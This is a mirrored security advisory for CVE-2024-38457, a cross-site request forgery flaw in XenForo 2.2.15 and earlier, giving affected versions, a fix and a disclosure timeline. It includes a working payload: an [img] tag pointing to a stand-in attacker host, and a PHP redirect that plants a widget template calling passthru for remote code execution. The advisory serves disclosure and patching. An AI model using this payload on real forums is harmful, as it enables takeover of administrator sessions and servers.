XenForo 2.2.15 Cross Site Request Forgery
Published: 2024-07-17
Source: https://afaghhosting.net/blog/xenforo-2-2-15-cross-site-request-forgery/ (mirror of https://packetstormsecurity.com/files/179585/KIS-2024-05.txt)

--------------------------------------------------------------------------
XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
--------------------------------------------------------------------------

[-] Software Link:

https://xenforo.com

[-] Affected Versions:

Version 2.2.15 and prior versions.

[-] Vulnerability Description:

The XF\Admin\Controller\Widget::actionSave() method, defined in the
/src/XF/Admin/Controller/Widget.php script, does not check whether the
current HTTP request is a POST or a GET before saving a widget. Because
XenForo performs anti-CSRF checks for POST requests only, this method
can be abused in a Cross-Site Request Forgery (CSRF) attack to create or
modify arbitrary XenForo widgets via GET requests. This can also be
exploited in tandem with KIS-2024-06 to perform CSRF-based Remote Code
Execution (RCE) attacks.

Furthermore, XenForo implements a BB code system, so this vulnerability
could also be exploited through "Stored CSRF" attacks by abusing the
[img] BB code tag, creating a thread or a private message (to be sent to
the victim user) like the following:

[img]https://attacker.website/exploit.php[/img]

Where the exploit.php script hosted on the attacker-controlled website
could be something like this:

<?php
$url = "https://victim.website/xenforo/";
header("Location: {$url}admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]={{\$xf.app.em.getRepository('XF\\Util\\Arr').filterRecursive(['id'],'passthru')}}");
?>

Successful exploitation of this vulnerability requires a victim user
with permissions to administer styles or widgets to be currently
logged into the Admin Control Panel.

[-] Solution:

Update to a fixed version or apply the vendor patches.

[-] Disclosure Timeline:

[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure
[05/06/2024] - Vendor released patches and fixed versions
[14/06/2024] - CVE identifier requested
[16/06/2024] - CVE identifier assigned
[16/07/2024] - Coordinated public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2024-38457 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Other References:

https://xenforo.com/community/threads/222133
https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/

[-] Original Advisory:

http://karmainsecurity.com/KIS-2024-05